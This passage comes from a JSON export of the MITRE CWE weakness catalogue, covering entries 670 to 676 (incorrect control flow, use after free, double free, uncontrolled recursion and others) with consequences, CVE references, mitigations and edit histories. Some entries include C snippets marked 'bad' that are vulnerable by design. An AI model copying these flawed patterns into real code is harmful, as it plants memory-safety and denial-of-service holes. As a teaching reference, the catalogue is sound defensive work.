Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Background_Details, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"670":{"attr":{"@_ID":"670","@_Name":"Always-Incorrect Control Flow Implementation","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code contains a control flow path that does not reflect the algorithm that the path is intended to implement, leading to incorrect behavior any time this path is navigated.","Extended_Description":"This weakness captures cases in which a particular code segment is always incorrect with respect to the algorithm that it is implementing. For example, if a C programmer intends to include multiple statements in a single block but does not include the enclosing braces (CWE-483), then the logic is always incorrect. This issue is in contrast to most weaknesses in which the code usually behaves correctly, except when it is externally manipulated in malicious ways.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"This issue typically appears in rarely-tested code, since the \\"always-incorrect\\" nature will be detected as a bug during normal usage."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Other","Alter Execution Logic"]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2021-3011","Description":"virtual interrupt controller in a virtualization product allows crash of host by writing a certain invalid value to a register, which triggers a fatal error instead of returning an error code","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3011"}},"Notes":{"Note":{"#text":"This node could possibly be split into lower-level nodes. \\"Early Return\\" is for returning control to the caller too soon (e.g., CWE-584). \\"Excess Return\\" is when control is returned too far up the call stack (CWE-600, CWE-395). \\"Improper control limitation\\" occurs when the product maintains control at a lower level of execution, when control should be returned \\"further\\" up the call stack (CWE-455). \\"Incorrect syntax\\" covers code that\'s \\"just plain wrong\\" such as CWE-484 and CWE-483.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Maintenance_Notes, Modes_of_Introduction, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Time_of_Introduction"}]}},"671":{"attr":{"@_ID":"671","@_Name":"Lack of Administrator Control over Security","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses security features in a way that prevents the product\'s administrator from tailoring security settings to reflect the environment in which the product is being used. This introduces resultant weaknesses or prevents it from operating at a level of security that is desired by the administrator.","Extended_Description":"If the product\'s administrator does not have the ability to manage security-related decisions at all times, then protecting the product from outside threats - including the product\'s developer - can become impossible. For example, a hard-coded account name and password cannot be changed by the administrator, thus exposing that product to attacks that the administrator can not prevent.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2008-04-11","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Design Principle Violation: Lack of Administrator Control over Security","attr":{"@_Date":"2009-01-12"}}}},"672":{"attr":{"@_ID":"672","@_Name":"Operation on a Resource after Expiration or Release","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses, accesses, or otherwise operates on a resource after that resource has been expired, released, or revoked.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"666","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality"],"Impact":["Modify Application Data","Read Application Data"],"Note":"If a released resource is subsequently reused or reallocated, then an attempt to use the original resource might allow access to sensitive data that is associated with a different user or entity."},{"Scope":["Other","Availability"],"Impact":["Other","DoS: Crash, Exit, or Restart"],"Note":"When a resource is released it might not be in an expected state, later attempts to access the resource may lead to resultant errors that may lead to a crash."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-71"},"Intro_Text":"The following code shows a simple example of a use after free error:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* ptr = (char*)malloc (SIZE);if (err) {}...if (abrt) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"abrt = 1;free(ptr);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logError(\\"operation aborted before commit\\", ptr);","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"When an error occurs, the pointer is immediately freed. However, this pointer is later incorrectly used in the logError function."},{"attr":{"@_Demonstrative_Example_ID":"DX-72"},"Intro_Text":"The following code shows a simple example of a double free error:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* ptr = (char*)malloc (SIZE);...if (abrt) {}...free(ptr);","xhtml:br":["","","",""],"xhtml:div":{"#text":"free(ptr);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":["Double free vulnerabilities have two common (and sometimes overlapping) causes:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Error conditions and other exceptional circumstances"},{"xhtml:div":"Confusion over which part of the program is responsible for freeing the memory"}]}},"Although some double free vulnerabilities are not much more complicated than the previous example, most are spread out across hundreds of lines of code or even different files. Programmers seem particularly susceptible to freeing global variables more than once."]},{"Intro_Text":"In the following C/C++ example the method processMessage is used to process a message received in the input array of char arrays. The input message array contains two char arrays: the first is the length of the message and the second is the body of the message. The length of the message is retrieved and used to allocate enough memory for a local char array, messageBody, to be created for the message body. The messageBody is processed in the method processMessageBody that will return an error if an error occurs while processing. If an error occurs then the return result variable is set to indicate an error and the messageBody char array memory is released using the method free and an error message is sent to the logError method.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define FAIL 0#define SUCCESS 1#define ERROR -1#define MAX_MESSAGE_SIZE 32int processMessage(char **message){}","xhtml:br":["","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int result = SUCCESS;int length = getMessageLength(message[0]);char *messageBody;if ((length > 0) && (length < MAX_MESSAGE_SIZE)) {}else {}if (result == ERROR) {}return result;","xhtml:br":["","","","","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"messageBody = (char*)malloc(length*sizeof(char));messageBody = &message[1][0];int success = processMessageBody(messageBody);if (success == ERROR) {}","xhtml:br":["","","","",""],"xhtml:div":{"#text":"result = ERROR;free(messageBody);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},{"#text":"printf(\\"Unable to process message; invalid message length\\");result = FAIL;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logError(\\"Error processing message\\", messageBody);","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...messageBody = (char*)malloc(length*sizeof(char));messageBody = &message[1][0];int success = processMessageBody(messageBody);if (success == ERROR) {}...","xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"result = ERROR;logError(\\"Error processing message\\", messageBody);free(messageBody);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}],"Body_Text":"However, the call to the method logError includes the messageBody after the memory for messageBody has been released using the free method. This can cause unexpected results and may lead to system crashes. A variable should never be used after its memory resources have been released."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2009-3547","Description":"chain: race condition might allow resource to be released before operating on it, leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP15","Entry_Name":"Faulty Resource Use"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO46-C","Entry_Name":"Do not access a closed file","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM30-C","Entry_Name":"Do not access freed memory","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-672"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-672"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Use of a Resource after Expiration or Release","attr":{"@_Date":"2010-02-16"}}}},"673":{"attr":{"@_ID":"673","@_Name":"External Influence of Sphere Definition","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not prevent the definition of control spheres from external actors.","Extended_Description":"Typically, a product defines its control sphere within the code itself, or through configuration by the product\'s administrator. In some cases, an external party can change the definition of the control sphere. This is typically a resultant weakness.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Consider a blog publishing tool, which might have three explicit control spheres: the creation of articles, only accessible to a \\"publisher;\\" commenting on articles, only accessible to a \\"commenter\\" who is a registered user; and reading articles, only accessible to an anonymous reader. Suppose that the application is deployed on a web server that is shared with untrusted parties. If a local user can modify the data files that define who a publisher is, then this user has modified the control sphere. In this case, the issue would be resultant from another weakness such as insufficient permissions."},{"Intro_Text":"In Untrusted Search Path (CWE-426), a user might be able to define the PATH environment variable to cause the product to search in the wrong directory for a library to load. The product\'s intended sphere of control would include \\"resources that are only modifiable by the person who installed the product.\\" The PATH effectively changes the definition of this sphere so that it overlaps the attacker\'s sphere of control."}]},"Notes":{"Note":{"#text":"A \\"control sphere\\" is a set of resources and behaviors that are accessible to a single actor, or a group of actors. A product\'s security model will typically define multiple spheres, possibly implicitly. For example, a server might define one sphere for \\"administrators\\" who can create new user accounts with subdirectories under /home/server/, and a second sphere might cover the set of users who can create or delete files within their own subdirectories. A third sphere might be \\"users who are authenticated to the operating system on which the product is installed.\\" Each sphere has different sets of actors and allowable behaviors.","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"674":{"attr":{"@_ID":"674","@_Name":"Uncontrolled Recursion","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not properly control the amount of recursion which takes place, consuming excessive resources, such as allocated memory or the program stack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Stack Exhaustion"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"The uncontrolled recursion is often due to an improper or missing conditional"}},"Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"Resources including CPU, memory, and stack memory could be rapidly consumed or exhausted, eventually leading to an exit or crash."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"In some cases, an application\'s interpreter might kill a process or thread that appears to be consuming too much resources, such as with PHP\'s memory_limit setting. When the interpreter kills the process/thread, it might report an error containing detailed information such as the application\'s installation path."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Ensure an end condition will be reached under all logic conditions. The end condition may include testing against the depth of recursion and exiting with an error if the recursion goes too deep. The complexity of the end condition contributes to the effectiveness of this action.","Effectiveness":"Moderate"},{"Phase":"Implementation","Description":"Increase the stack size.","Effectiveness":"Limited","Effectiveness_Notes":"Increasing the stack size might only be a temporary measure, since the stack typically is still not very large, and it might remain easy for attackers to cause an out-of-stack fault."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example a mistake exists in the code where the exit condition contained in flg is never called. This results in the function calling itself over and over again until the stack is exhausted.","Example_Code":[{"#text":"void do_something_recursive (int flg){}int flag = 1; // Set to TRUEdo_something_recursive (flag);","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"... // Do some real work here, but the value of flg is unmodifiedif (flg) { do_something_recursive (flg); } // flg is never modified so it is always TRUE - this call will continue until the stack explodes","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"void do_something_recursive (int flg){}int flag = 1; // Set to TRUEdo_something_recursive (flag);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"... // Do some real work here","attr":{"@_style":"margin-left:20px;"}},{"#text":"// Modify value of flg on done condition","attr":{"@_style":"margin-left:10px;"}},{"#text":"if (flg) { do_something_recursive (flg); } // returns when flg changes to 0","attr":{"@_style":"margin-left:10px;"}}]}],"Body_Text":"Note that the only difference between the Good and Bad examples is that the recursion flag will change value and cause the recursive to return."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-1285","Description":"Deeply nested arrays trigger stack exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1285"},{"Reference":"CVE-2007-3409","Description":"Self-referencing pointers create infinite loop and resultant stack exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3409"},{"Reference":"CVE-2016-10707","Description":"Javascript application accidentally changes input in a way that prevents a recursive call from detecting an exit condition.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10707"},{"Reference":"CVE-2016-3627","Description":"An attempt to recover a corrupted XML file infinite recursion protection counter was not always incremented missing the exit condition.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3627"},{"Reference":"CVE-2019-15118","Description":"USB-audio driver\'s descriptor code parsing allows unlimited recursion leading to stack exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15118"}]},"Affected_Resources":{"Affected_Resource":"CPU"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP13","Entry_Name":"Unrestricted Consumption"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-674"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"230"}},{"attr":{"@_CAPEC_ID":"231"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-674"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Observed_Examples, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}]}},"675":{"attr":{"@_ID":"675","@_Name":"Multiple Operations on Resource in Single-Operation Context","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product performs the same operation on a resource two or more times, when the operation should only be applied once.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"586","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"102","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Notes":{"Note":{"#text":"This weakness is probably closely associated with other issues related to doubling, such as CWE-462 (duplicate key in alist) or CWE-102 (Struts duplicate validation forms). It\'s usually a case of an API contract violation (CWE-227).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Relevant_Properties, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"676":{"attr":{"@_ID":"676","@_Name":"Use of Potentially Dangerous Function","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program invokes a potentially dangerous function that could introduce a vulnerability if it is used incorrectly, but the function can also be used safely.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1177","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Indirect"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Varies by Context","Quality Degradation","Unexpected State"],"Note":"If the function is used incorrectly, then it could result in security problems."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be 